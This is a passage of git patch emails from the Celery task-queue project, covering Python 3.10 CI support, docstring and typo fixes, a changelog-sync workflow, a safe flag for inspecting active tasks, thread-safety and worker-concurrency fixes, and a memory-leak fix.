From 82fe649d8aed5145c5f05d3aabb88ea9721143d4 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 30 Jun 2021 02:29:09 +0300
Subject: [PATCH 001/177] Add Python 3.10 support (#6807)
* Add Python 3.10 support.
* Use the dev release for now.
* Include deps for 3.10.
* Bump moto to support Python 3.10.
* Currently, eventlet is not supported by 3.10.
* Skip if eventlet not found.
* Test 3.10 using tox.
* Try tox-gh-actions.
* Map python versions to tox environments.
* Allow the 3.10 job to fail for now.
---
.github/workflows/python-package.yml | 8 ++++----
requirements/extras/eventlet.txt | 2 +-
requirements/test.txt | 2 +-
t/unit/backends/test_asynchronous.py | 1 +
tox.ini | 23 +++++++++++++----------
5 files changed, 20 insertions(+), 16 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 673e1f04ac8..3f74d81eda7 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,8 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.6', '3.7', '3.8', '3.9', 'pypy3']
+ python-version: ['3.6', '3.7', '3.8', '3.9', '3.10.0-beta.3', 'pypy3']
+ continue-on-error: ${{ matrix.python-version == '3.10.0-beta.3' }}
steps:
- name: Install apt packages
@@ -50,14 +51,13 @@ jobs:
${{ matrix.python-version }}-v1-
- name: Install tox
- run: python -m pip install tox
+ run: python -m pip install tox tox-gh-actions
- name: >
Run tox for
"${{ matrix.python-version }}-unit"
timeout-minutes: 15
run: >
- tox --verbose --verbose -e
- "${{ matrix.python-version }}-unit"
+ tox --verbose --verbose
- uses: codecov/codecov-action@v1
with:
diff --git a/requirements/extras/eventlet.txt b/requirements/extras/eventlet.txt
index e375a087b83..a25cb65d4f0 100644
--- a/requirements/extras/eventlet.txt
+++ b/requirements/extras/eventlet.txt
@@ -1 +1 @@
-eventlet>=0.26.1
+eventlet>=0.26.1; python_version<"3.10"
diff --git a/requirements/test.txt b/requirements/test.txt
index 2f08e36f734..0325981f8e8 100644
--- a/requirements/test.txt
+++ b/requirements/test.txt
@@ -4,7 +4,7 @@ pytest-celery
pytest-subtests
pytest-timeout~=1.4.2
boto3>=1.9.178
-moto==1.3.7
+moto==2.0.10
pre-commit
-r extras/yaml.txt
-r extras/msgpack.txt
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index 75ba90baa97..df25a683bc3 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -12,6 +12,7 @@
from celery.utils import cached_property
pytest.importorskip('gevent')
+pytest.importorskip('eventlet')
@pytest.fixture(autouse=True)
diff --git a/tox.ini b/tox.ini
index 51cf5d0209d..6c74e65576b 100644
--- a/tox.ini
+++ b/tox.ini
@@ -1,7 +1,9 @@
[tox]
+requires =
+ tox-gh-actions
envlist =
- {3.6,3.7,3.8,3.9,pypy3}-unit
- {3.6,3.7,3.8,3.9,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
+ {3.6,3.7,3.8,3.9,3.10,pypy3}-unit
+ {3.6,3.7,3.8,3.9,3.10,pypy3}-integration-{rabbitmq,redis,dynamodb,azureblockblob,cache,cassandra,elasticsearch}
flake8
apicheck
@@ -11,11 +13,12 @@ envlist =
[gh-actions]
python =
- 3.6: 3.6
- 3.7: 3.7
- 3.8: 3.8
- 3.9: 3.9
- pypy3: pypy3
+ 3.6: 3.6-unit
+ 3.7: 3.7-unit
+ 3.8: 3.8-unit
+ 3.9: 3.9-unit
+ 3.10: 3.10-unit
+ pypy3: pypy3-unit
[testenv]
sitepackages = False
@@ -28,9 +31,8 @@ deps=
-r{toxinidir}/requirements/test.txt
-r{toxinidir}/requirements/pkgutils.txt
- 3.6,3.7,3.8,3.9: -r{toxinidir}/requirements/test-ci-default.txt
- 3.5,3.6,3.7,3.8,3.9: -r{toxinidir}/requirements/docs.txt
- 3.6,3.7,3.8,3.9: -r{toxinidir}/requirements/docs.txt
+ 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/test-ci-default.txt
+ 3.6,3.7,3.8,3.9,3.10: -r{toxinidir}/requirements/docs.txt
pypy3: -r{toxinidir}/requirements/test-ci-default.txt
integration: -r{toxinidir}/requirements/test-integration.txt
@@ -75,6 +77,7 @@ basepython =
3.7: python3.7
3.8: python3.8
3.9: python3.9
+ 3.10: python3.10
pypy3: pypy3
flake8,apicheck,linkcheck,configcheck,bandit: python3.9
usedevelop = True
From c33e9b2a6905a239c45e6f50437394db69fa41db Mon Sep 17 00:00:00 2001
From: "Steinar V. Kaldager"
Date: Wed, 30 Jun 2021 19:21:06 +0200
Subject: [PATCH 002/177] Fix docstring for Signal.send to match code
---
celery/utils/dispatch/signal.py | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/celery/utils/dispatch/signal.py b/celery/utils/dispatch/signal.py
index b12759c4f37..0cfa6127ed0 100644
--- a/celery/utils/dispatch/signal.py
+++ b/celery/utils/dispatch/signal.py
@@ -254,9 +254,9 @@ def has_listeners(self, sender=None):
def send(self, sender, **named):
"""Send signal from sender to all connected receivers.
- If any receiver raises an error, the error propagates back through
- send, terminating the dispatch loop, so it is quite possible to not
- have all receivers called if a raises an error.
+ If any receiver raises an error, the exception is returned as the
+ corresponding response. (This is different from the "send" in
+ Django signals. In Celery "send" and "send_robust" do the same thing.)
Arguments:
sender (Any): The sender of the signal.
From 3ec65fd7601567b22e1614a750738e6e5c9002dc Mon Sep 17 00:00:00 2001
From: Jonas Kittner
Date: Fri, 2 Jul 2021 18:30:06 +0200
Subject: [PATCH 003/177] fix: no blank line in log output
---
celery/utils/log.py | 1 +
t/unit/app/test_log.py | 4 +++-
2 files changed, 4 insertions(+), 1 deletion(-)
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 58f194755a2..8ca34e7c5ae 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -223,6 +223,7 @@ def write(self, data):
if getattr(self._thread, 'recurse_protection', False):
# Logger is logging back to this file, so stop recursing.
return 0
+ data = data.rstrip('\n')
if data and not self.closed:
self._thread.recurse_protection = True
try:
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index 971692497c4..cbe191f41d6 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -268,8 +268,10 @@ def test_logging_proxy(self):
p.write('foo')
assert 'foo' not in sio.getvalue()
p.closed = False
+ p.write('\n')
+ assert sio.getvalue() == ''
write_res = p.write('foo ')
- assert 'foo ' in sio.getvalue()
+ assert sio.getvalue() == 'foo \n'
assert write_res == 4
lines = ['baz', 'xuzzy']
p.writelines(lines)
From 3973e30da819dbe878d9b9a4ab51765a9075f6d6 Mon Sep 17 00:00:00 2001
From: Nahin Khan
Date: Mon, 5 Jul 2021 22:34:10 +0300
Subject: [PATCH 004/177] Fix typo
---
docs/getting-started/first-steps-with-celery.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/getting-started/first-steps-with-celery.rst b/docs/getting-started/first-steps-with-celery.rst
index 13bdc8cc429..799db7200d7 100644
--- a/docs/getting-started/first-steps-with-celery.rst
+++ b/docs/getting-started/first-steps-with-celery.rst
@@ -141,7 +141,7 @@ This is only needed so that names can be automatically generated when the tasks
defined in the `__main__` module.
The second argument is the broker keyword argument, specifying the URL of the
-message broker you want to use. Here using RabbitMQ (also the default option).
+message broker you want to use. Here we are using RabbitMQ (also the default option).
See :ref:`celerytut-broker` above for more choices --
for RabbitMQ you can use ``amqp://localhost``, or for Redis you can
From e972affc0ac14a92492fea59354d4be5f8260e92 Mon Sep 17 00:00:00 2001
From: Issa Jubril
Date: Tue, 6 Jul 2021 17:43:11 +0100
Subject: [PATCH 005/177] Update copyright (#6842)
---
docs/conf.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/conf.py b/docs/conf.py
index 6cc0f92fe64..d5c4c9276fa 100644
--- a/docs/conf.py
+++ b/docs/conf.py
@@ -10,7 +10,7 @@
github_project='celery/celery',
author='Ask Solem & contributors',
author_name='Ask Solem',
- copyright='2009-2018',
+ copyright='2009-2021',
publisher='Celery Project',
html_logo='images/celery_512.png',
html_favicon='images/favicon.ico',
From e885a47b0c73aef0112bf989a2642c125889a2ca Mon Sep 17 00:00:00 2001
From: Dave Gaeddert
Date: Wed, 7 Jul 2021 13:04:24 -0500
Subject: [PATCH 006/177] Use the dropseed/changerelease action to sync
changelog to GitHub Releases (#6843)
* Create changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Update changerelease.yml
* Add workflow permissions
---
.github/workflows/changerelease.yml | 32 +++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 .github/workflows/changerelease.yml
diff --git a/.github/workflows/changerelease.yml b/.github/workflows/changerelease.yml
new file mode 100644
index 00000000000..efbf5a52fef
--- /dev/null
+++ b/.github/workflows/changerelease.yml
@@ -0,0 +1,32 @@
+name: changerelease
+on:
+ workflow_dispatch: {}
+ push:
+ paths: [Changelog.rst]
+ branches: [master]
+ tags: ["*"]
+
+permissions:
+ contents: write
+
+jobs:
+ sync:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: docker://pandoc/core:2.14
+ with:
+ args: "Changelog.rst -f rst -t markdown -o CR_CHANGELOG.md"
+ - name: "Clean up markdown"
+ run: |
+ # https://stackoverflow.com/a/1252191/1110798
+ cat CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-date\n\n: /Release date: /g' CR_CHANGELOG.md
+ sed -i -e ':a' -e 'N' -e '$!ba' -e 's/release-by\n\n: /Release by: /g' CR_CHANGELOG.md
+ cat CR_CHANGELOG.md
+ - uses: dropseed/changerelease@v1
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ changelog: CR_CHANGELOG.md
+ remote_changelog: false
+ limit: -1
From 52b6238a87f80c3c63d79595deb375518af95372 Mon Sep 17 00:00:00 2001
From: ghoulmaster
Date: Fri, 9 Jul 2021 01:26:04 -0400
Subject: [PATCH 007/177] Chords, get body_type independently to handle cases
where body.type does not exist ... (#6847)
* Get body_type independently to handle cases where body.type does not exist due to tasks being created via Signatures
* body.get() was returning None always, must getattr() and catch the NotRegistered Error if the app that generated the task is not the app that owns the task
* flake8 fix for too many blank lines
---
celery/backends/base.py | 9 +++++++--
t/unit/backends/test_base.py | 15 +++++++++++++++
2 files changed, 22 insertions(+), 2 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index f7ef15f53de..fb1cc408d49 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -644,8 +644,13 @@ def set_chord_size(self, group_id, chord_size):
def fallback_chord_unlock(self, header_result, body, countdown=1,
**kwargs):
kwargs['result'] = [r.as_tuple() for r in header_result]
- queue = body.options.get('queue', getattr(body.type, 'queue', None))
- priority = body.options.get('priority', getattr(body.type, 'priority', 0))
+ try:
+ body_type = getattr(body, 'type', None)
+ except NotRegistered:
+ body_type = None
+
+ queue = body.options.get('queue', getattr(body_type, 'queue', None))
+ priority = body.options.get('priority', getattr(body_type, 'priority', 0))
self.app.tasks['celery.chord_unlock'].apply_async(
(header_result.id, body,), kwargs,
countdown=countdown,
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 5d98877637d..5d04e8a7d03 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -220,6 +220,21 @@ def callback_queue(result):
called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
assert called_kwargs['queue'] == 'test_queue_two'
+ with self.Celery() as app2:
+ @app2.task(name='callback_different_app', shared=False)
+ def callback_different_app(result):
+ pass
+
+ callback_different_app_signature = self.app.signature('callback_different_app')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] is None
+
+ callback_different_app_signature.set(queue='test_queue_three')
+ self.b.apply_chord(header_result_args, callback_different_app_signature)
+ called_kwargs = self.app.tasks[unlock].apply_async.call_args[1]
+ assert called_kwargs['queue'] == 'test_queue_three'
+
class test_exception_pickle:
def test_BaseException(self):
From 1b67ccdaafd0bde67b46bc38827b3ef5f8b65444 Mon Sep 17 00:00:00 2001
From: Dash J <4606735+djungic@users.noreply.github.com>
Date: Fri, 9 Jul 2021 16:49:31 +0100
Subject: [PATCH 008/177] Fix #6844 by allowing safe queries via
app.inspect().active(). (#6849)
* Fix #6844 by allowing safe (i.e. skip arg derserialization) queries via app.inspect().active().
* Fix default active arg test expectation.
* Fix test asserting broken behaviour (arg/kwarg deserialization occuring when safe=True).
Co-authored-by: Damir Jungic
---
celery/app/control.py | 7 +++----
celery/worker/control.py | 4 ++--
celery/worker/request.py | 4 ++--
t/unit/app/test_control.py | 6 +++++-
t/unit/worker/test_control.py | 14 ++++++++++++++
t/unit/worker/test_request.py | 4 ++--
6 files changed, 28 insertions(+), 11 deletions(-)
diff --git a/celery/app/control.py b/celery/app/control.py
index 05b7012ac3d..742b5e5be3b 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -135,6 +135,8 @@ def clock(self):
def active(self, safe=None):
"""Return list of tasks currently executed by workers.
+ Arguments:
+ safe (Boolean): Set to True to disable deserialization.
Returns:
Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``.
@@ -142,11 +144,8 @@ def active(self, safe=None):
See Also:
For ``TASK_INFO`` details see :func:`query_task` return value.
- Note:
- ``safe`` is ignored since 4.0 as no objects will need
- serialization now that we have argsrepr/kwargsrepr.
"""
- return self._request('active')
+ return self._request('active', safe=safe)
def scheduled(self, safe=None):
"""Return list of scheduled tasks with details.
diff --git a/celery/worker/control.py b/celery/worker/control.py
index 9d8a6797dee..9dd00d22a97 100644
--- a/celery/worker/control.py
+++ b/celery/worker/control.py
@@ -362,9 +362,9 @@ def reserved(state, **kwargs):
@inspect_command(alias='dump_active')
-def active(state, **kwargs):
+def active(state, safe=False, **kwargs):
"""List of tasks currently being executed."""
- return [request.info()
+ return [request.info(safe=safe)
for request in state.tset(worker_state.active_requests)]
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 1760fa489cf..7cdb87fe054 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -600,8 +600,8 @@ def info(self, safe=False):
return {
'id': self.id,
'name': self.name,
- 'args': self._args,
- 'kwargs': self._kwargs,
+ 'args': self._args if not safe else self._argsrepr,
+ 'kwargs': self._kwargs if not safe else self._kwargsrepr,
'type': self._type,
'hostname': self._hostname,
'time_start': self.time_start,
diff --git a/t/unit/app/test_control.py b/t/unit/app/test_control.py
index 2a80138c09b..37fa3e8b2ae 100644
--- a/t/unit/app/test_control.py
+++ b/t/unit/app/test_control.py
@@ -95,7 +95,11 @@ def assert_broadcast_called(self, command,
def test_active(self):
self.inspect.active()
- self.assert_broadcast_called('active')
+ self.assert_broadcast_called('active', safe=None)
+
+ def test_active_safe(self):
+ self.inspect.active(safe=True)
+ self.assert_broadcast_called('active', safe=True)
def test_clock(self):
self.inspect.clock()
diff --git a/t/unit/worker/test_control.py b/t/unit/worker/test_control.py
index c2edc58696c..72ea98c4603 100644
--- a/t/unit/worker/test_control.py
+++ b/t/unit/worker/test_control.py
@@ -298,6 +298,20 @@ def test_active(self):
finally:
worker_state.active_requests.discard(r)
+ def test_active_safe(self):
+ kwargsrepr = ''
+ r = Request(
+ self.TaskMessage(self.mytask.name, id='do re mi',
+ kwargsrepr=kwargsrepr),
+ app=self.app,
+ )
+ worker_state.active_requests.add(r)
+ try:
+ active_resp = self.panel.handle('dump_active', {'safe': True})
+ assert active_resp[0]['kwargs'] == kwargsrepr
+ finally:
+ worker_state.active_requests.discard(r)
+
def test_pool_grow(self):
class MockPool:
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 176c88e21d7..9a6832bbd04 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -232,7 +232,7 @@ def test_info_function(self):
kwargs[str(i)] = ''.join(
random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == kwargs
+ self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
@@ -240,7 +240,7 @@ def test_info_function(self):
args.append(''.join(
random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == args
+ self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
From 5fd182417d9a6cb1b5aebe29916814d7a725e62a Mon Sep 17 00:00:00 2001
From: Konstantin Kochin
Date: Sun, 11 Jul 2021 19:52:33 +0300
Subject: [PATCH 009/177] Fix multithreaded backend usage (#6851)
* Add test of backend usage by threads
Add simple test with embedded worker that checks
backend instance usage by threads. According
merge request #6416 backends should be thread local.
* Fix backend captures in the `celery.app.trace.build_tracer`
Fix backend capturing by closure during task creation in the function `celery.app.trace.build_tracer`, as different threads may create and use celery task. It complement changes in the pull request #6416.
* Fix flake8 errors
Fix flake8 errors from Celery/lint github workflow step
---
CONTRIBUTORS.txt | 1 +
celery/app/control.py | 1 +
celery/app/trace.py | 11 ++--
t/unit/app/test_backends.py | 99 +++++++++++++++++++++++++++++++++++
t/unit/worker/test_request.py | 4 +-
5 files changed, 106 insertions(+), 10 deletions(-)
diff --git a/CONTRIBUTORS.txt b/CONTRIBUTORS.txt
index 17fe5d9442b..9a1f42338e8 100644
--- a/CONTRIBUTORS.txt
+++ b/CONTRIBUTORS.txt
@@ -282,3 +282,4 @@ Henrik Bruåsdal, 2020/11/29
Tom Wojcik, 2021/01/24
Ruaridh Williamson, 2021/03/09
Patrick Zhang, 2017/08/19
+Konstantin Kochin, 2021/07/11
diff --git a/celery/app/control.py b/celery/app/control.py
index 742b5e5be3b..8bde53aebe1 100644
--- a/celery/app/control.py
+++ b/celery/app/control.py
@@ -135,6 +135,7 @@ def clock(self):
def active(self, safe=None):
"""Return list of tasks currently executed by workers.
+
Arguments:
safe (Boolean): Set to True to disable deserialization.
diff --git a/celery/app/trace.py b/celery/app/trace.py
index 9a56f870768..a5e3fc3f5a8 100644
--- a/celery/app/trace.py
+++ b/celery/app/trace.py
@@ -325,7 +325,6 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
fun = task if task_has_custom(task, '__call__') else task.run
loader = loader or app.loader
- backend = task.backend
ignore_result = task.ignore_result
track_started = task.track_started
track_started = not eager and (task.track_started and not ignore_result)
@@ -353,10 +352,6 @@ def build_tracer(name, task, loader=None, hostname=None, store_errors=True,
if task_has_custom(task, 'after_return'):
task_after_return = task.after_return
- store_result = backend.store_result
- mark_as_done = backend.mark_as_done
- backend_cleanup = backend.process_cleanup
-
pid = os.getpid()
request_stack = task.request_stack
@@ -440,7 +435,7 @@ def trace_task(uuid, args, kwargs, request=None):
args=args, kwargs=kwargs)
loader_task_init(uuid, task)
if track_started:
- store_result(
+ task.backend.store_result(
uuid, {'pid': pid, 'hostname': hostname}, STARTED,
request=task_request,
)
@@ -514,7 +509,7 @@ def trace_task(uuid, args, kwargs, request=None):
parent_id=uuid, root_id=root_id,
priority=task_priority
)
- mark_as_done(
+ task.backend.mark_as_done(
uuid, retval, task_request, publish_result,
)
except EncodeError as exc:
@@ -551,7 +546,7 @@ def trace_task(uuid, args, kwargs, request=None):
pop_request()
if not eager:
try:
- backend_cleanup()
+ task.backend.process_cleanup()
loader_cleanup()
except (KeyboardInterrupt, SystemExit, MemoryError):
raise
diff --git a/t/unit/app/test_backends.py b/t/unit/app/test_backends.py
index a87f9665053..df4e47af772 100644
--- a/t/unit/app/test_backends.py
+++ b/t/unit/app/test_backends.py
@@ -1,10 +1,87 @@
+import threading
+from contextlib import contextmanager
from unittest.mock import patch
import pytest
+import celery.contrib.testing.worker as contrib_embed_worker
from celery.app import backends
from celery.backends.cache import CacheBackend
from celery.exceptions import ImproperlyConfigured
+from celery.utils.nodenames import anon_nodename
+
+
+class CachedBackendWithTreadTrucking(CacheBackend):
+ test_instance_count = 0
+ test_call_stats = {}
+
+ def _track_attribute_access(self, method_name):
+ cls = type(self)
+
+ instance_no = getattr(self, '_instance_no', None)
+ if instance_no is None:
+ instance_no = self._instance_no = cls.test_instance_count
+ cls.test_instance_count += 1
+ cls.test_call_stats[instance_no] = []
+
+ cls.test_call_stats[instance_no].append({
+ 'thread_id': threading.get_ident(),
+ 'method_name': method_name
+ })
+
+ def __getattribute__(self, name):
+ if name == '_instance_no' or name == '_track_attribute_access':
+ return super().__getattribute__(name)
+
+ if name.startswith('__') and name != '__init__':
+ return super().__getattribute__(name)
+
+ self._track_attribute_access(name)
+ return super().__getattribute__(name)
+
+
+@contextmanager
+def embed_worker(app,
+ concurrency=1,
+ pool='threading', **kwargs):
+ """
+ Helper embedded worker for testing.
+
+ It's based on a :func:`celery.contrib.testing.worker.start_worker`,
+ but doesn't modifies logging settings and additionally shutdown
+ worker pool.
+ """
+ # prepare application for worker
+ app.finalize()
+ app.set_current()
+
+ worker = contrib_embed_worker.TestWorkController(
+ app=app,
+ concurrency=concurrency,
+ hostname=anon_nodename(),
+ pool=pool,
+ # not allowed to override TestWorkController.on_consumer_ready
+ ready_callback=None,
+ without_heartbeat=kwargs.pop("without_heartbeat", True),
+ without_mingle=True,
+ without_gossip=True,
+ **kwargs
+ )
+
+ t = threading.Thread(target=worker.start, daemon=True)
+ t.start()
+ worker.ensure_started()
+
+ yield worker
+
+ worker.stop()
+ t.join(10.0)
+ if t.is_alive():
+ raise RuntimeError(
+ "Worker thread failed to exit within the allocated timeout. "
+ "Consider raising `shutdown_timeout` if your tasks take longer "
+ "to execute."
+ )
class test_backends:
@@ -35,3 +112,25 @@ def test_sym_raises_ValuError(self, app):
def test_backend_can_not_be_module(self, app):
with pytest.raises(ImproperlyConfigured):
backends.by_name(pytest, app.loader)
+
+ @pytest.mark.celery(
+ result_backend=f'{CachedBackendWithTreadTrucking.__module__}.'
+ f'{CachedBackendWithTreadTrucking.__qualname__}'
+ f'+memory://')
+ def test_backend_thread_safety(self):
+ @self.app.task
+ def dummy_add_task(x, y):
+ return x + y
+
+ with embed_worker(app=self.app, pool='threads'):
+ result = dummy_add_task.delay(6, 9)
+ assert result.get(timeout=10) == 15
+
+ call_stats = CachedBackendWithTreadTrucking.test_call_stats
+ # check that backend instance is used without same thread
+ for backend_call_stats in call_stats.values():
+ thread_ids = set()
+ for call_stat in backend_call_stats:
+ thread_ids.add(call_stat['thread_id'])
+ assert len(thread_ids) <= 1, \
+ "The same celery backend instance is used by multiple threads"
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 9a6832bbd04..8e6e92d63ee 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -232,7 +232,7 @@ def test_info_function(self):
kwargs[str(i)] = ''.join(
random.choice(string.ascii_lowercase) for i in range(1000))
assert self.get_request(
- self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
+ self.add.s(**kwargs)).info(safe=True).get('kwargs') == '' # mock message doesn't populate kwargsrepr
assert self.get_request(
self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs
args = []
@@ -240,7 +240,7 @@ def test_info_function(self):
args.append(''.join(
random.choice(string.ascii_lowercase) for i in range(1000)))
assert list(self.get_request(
- self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
+ self.add.s(*args)).info(safe=True).get('args')) == [] # mock message doesn't populate argsrepr
assert list(self.get_request(
self.add.s(*args)).info(safe=False).get('args')) == args
From 044cebaa533db7629670db1fdb3173e0951522af Mon Sep 17 00:00:00 2001
From: "Lewis M. Kabui" <13940255+lewisemm@users.noreply.github.com>
Date: Tue, 13 Jul 2021 10:11:44 +0300
Subject: [PATCH 010/177] Fix Open Collective donate button (#6848)
* Fix Open Collective donate button
Fixes #6828
* Use OpenCollective anchor button
- Replace OpenCollective button script with an tag. The button
script imposes a fixed width of 300px which makes it too big and
out of place relative to neighbouring HTML elements.
Co-authored-by: Lewis Kabui
---
docs/_templates/sidebardonations.html | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/docs/_templates/sidebardonations.html b/docs/_templates/sidebardonations.html
index 9049cab2cab..2eebc8ec0bc 100644
--- a/docs/_templates/sidebardonations.html
+++ b/docs/_templates/sidebardonations.html
@@ -1,8 +1,9 @@
-
Donations
Please help support this community project with a donation.
-
+
+
+
From 7b5a44d646f43288fb546da10a1141347b01543b Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Sun, 11 Jul 2021 23:15:34 -0300
Subject: [PATCH 011/177] Fix setting worker concurrency option after signal
Allow to set "worker_concurrency" option through
"user_preload_options" signal mechanism.
Current behaviour:
1. "click.option" decorator for "--concurrency" option is executed,
its callback returns "0" when evaluating "value or
ctx.obj.app.conf.worker_concurrency" (None or 0). This default "0"
comes from "app.defaults".
2. Celery "user_preload_options" signal is processed, then
"app.conf.worker_concurrency" value is correctly updated through
"Settings.update".
3. Celery "worker.worker.WorkController.setup_defaults" kicks off
and "concurrency" attribute is resolved with
"either('worker_concurrency', concurrency)"
4. "either" method (app.base) chains calls to "first" function with
"None" as predicate (returns the first item that's not "None"),
in our case "first(None, defaults)" (defaults=(0,)) will take
precedence and and "0" will be returned, whatever value is in
"app.conf.worker_concurrency".
This fix changes "worker_concurrency" default from "0" to "None"
allowing "either" method to correctly resolve in favor
of "app.conf.worker_concurrency" value.
The final value used as concurrency is resolved in "worker.worker"
with conditional "if not self.concurrency" thus having "None"
as default value for "self.concurrency" doesn't break things.
Fixes #6836
---
celery/app/defaults.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/app/defaults.py b/celery/app/defaults.py
index 1883f2565bb..70f4fb8b0ac 100644
--- a/celery/app/defaults.py
+++ b/celery/app/defaults.py
@@ -294,7 +294,7 @@ def __repr__(self):
cancel_long_running_tasks_on_connection_loss=Option(
False, type='bool'
),
- concurrency=Option(0, type='int'),
+ concurrency=Option(None, type='int'),
consumer=Option('celery.worker.consumer:Consumer', type='string'),
direct=Option(False, type='bool', old={'celery_worker_direct'}),
disable_rate_limits=Option(
From ca489c6f7767ed796bce10400321fe08b4820c0c Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 14 Jul 2021 03:18:18 +0300
Subject: [PATCH 012/177] Make ``ResultSet.on_ready`` promise hold a weakref to
self. (#6784)
---
celery/result.py | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/celery/result.py b/celery/result.py
index 0c10d58e86c..d8d7d1685c5 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -2,6 +2,7 @@
import datetime
import time
+from weakref import proxy
from collections import deque
from contextlib import contextmanager
@@ -535,7 +536,7 @@ class ResultSet(ResultBase):
def __init__(self, results, app=None, ready_barrier=None, **kwargs):
self._app = app
self.results = results
- self.on_ready = promise(args=(self,))
+ self.on_ready = promise(args=(proxy(self),))
self._on_full = ready_barrier or barrier(results)
if self._on_full:
self._on_full.then(promise(self._on_ready, weak=True))
From 2dfb6fb3c9b8a0908c908a0d93e79fba90f02c5d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Przemys=C5=82aw=20=C5=81ada?=
Date: Mon, 19 Jul 2021 12:17:22 +0200
Subject: [PATCH 013/177] Update configuration.rst
Update default `worker_task_log_format` value
---
docs/userguide/configuration.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 739dc5680c4..14fa89df2ca 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -3006,7 +3006,7 @@ Default:
.. code-block:: text
"[%(asctime)s: %(levelname)s/%(processName)s]
- [%(task_name)s(%(task_id)s)] %(message)s"
+ %(task_name)s[%(task_id)s]: %(message)s"
The format to use for log messages logged in tasks.
From 41b2d2e50205b92bab08a2401c104c2cb818bdd4 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 20 Jul 2021 02:04:21 +0300
Subject: [PATCH 014/177] Discard jobs on flush if synack isn't enabled.
(#6863)
Fixes #6855.
A connection loss flushes the asynpool (See https://github.com/celery/celery/blob/117cd9ca410e8879f71bd84be27b8e69e462c56a/celery/worker/consumer/consumer.py#L414).
This is expected as these jobs cannot be completed anymore.
However, jobs which have not been accepted yet (that is, they are not running yet) are cancelled. This only works if the synack keyword argument is set to True.
In our case, it isn't and therefore the jobs remain in the pool's cache forever.
This is a memory leak which we have now resolved by discarding the job (which clears it from the cache) as they will never be cancelled.
---
celery/concurrency/asynpool.py | 10 +++++++---
1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index f4d1c475a8e..c6612aff64f 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -978,10 +978,14 @@ def _write_ack(fd, ack, callback=None):
def flush(self):
if self._state == TERMINATE:
return
- # cancel all tasks that haven't been accepted so that NACK is sent.
- for job in self._cache.values():
+ # cancel all tasks that haven't been accepted so that NACK is sent
+ # if synack is enabled.
